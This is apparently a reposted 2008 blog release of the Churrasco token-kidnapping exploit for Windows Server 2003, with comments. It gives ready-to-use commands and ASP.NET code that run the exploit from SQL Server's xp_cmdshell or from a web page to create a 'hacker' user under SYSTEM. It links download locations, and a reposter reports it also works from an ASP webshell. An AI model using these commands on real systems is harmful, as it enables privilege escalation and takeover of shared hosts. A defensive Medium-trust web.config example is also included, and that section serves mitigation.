It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that allows executing code under the SYSTEM account.
Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows services accounts can impersonate. Other processes (not services) that can impersonate are IIS 6 worker processes so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recommend not allowing users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'
-Exploiting IIS 6 with ASP .NET:
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName = Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments = " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
backup link: http://milw0rm.com/sploits/2008-Churrasco.zip
Enjoy.
Cesar.
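Cesar's shared-hosting recommendation, as an added configuration example that is not part of his post or of the Churrasco package: on ASP.NET 2.0 the root web.config (default location %windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\web.config) can force every hosted application into Medium trust and lock the setting so a site's own web.config cannot override it. System.Diagnostics.Process link-demands Full trust, so the Process.Start() call shown above then fails with a SecurityException instead of launching the binary.

```xml
<!-- Root web.config for .NET Framework 2.0 (default location:
     %windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\web.config).
     Added example: only the elements relevant to the trust level are shown. -->
<configuration>
  <!-- allowOverride="false" locks the trust level machine-wide: a hosted
       site's own web.config cannot raise itself back to Full trust. -->
  <location allowOverride="false">
    <system.web>
      <securityPolicy>
        <trustLevel name="Full"    policyFile="internal" />
        <trustLevel name="High"    policyFile="web_hightrust.config" />
        <trustLevel name="Medium"  policyFile="web_mediumtrust.config" />
        <trustLevel name="Low"     policyFile="web_lowtrust.config" />
        <trustLevel name="Minimal" policyFile="web_minimaltrust.config" />
      </securityPolicy>
      <!-- Medium trust: no unmanaged code, no registry access, file I/O
           limited to the application directory, and no
           System.Diagnostics.Process (the class link-demands Full trust),
           so spawning churrasco.exe from a page throws SecurityException. -->
      <trust level="Medium" originUrl="" />
    </system.web>
  </location>
</configuration>
```

This covers managed code only; classic ASP pages, which the post also names, are not governed by CLR trust levels and need separate controls.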
冷漠 PS: I tested it successfully in a virtual machine, on Windows 2003 SP1 with all patches. Under .NET, that is, with only User privileges, it executed system commands successfully. Very powerful. Screenshots below:
Update: According to a friend's testing, it also escalates privileges successfully from an ASP webshell, meaning system commands can be executed even as guest, but .NET support is required.
Code download:

Compiled EXP:

MK2
October 9, 2008 17:25
Good stuff. Please post a compiled build....
!4p47hy replied on October 11, 2008 13:19
Already uploaded.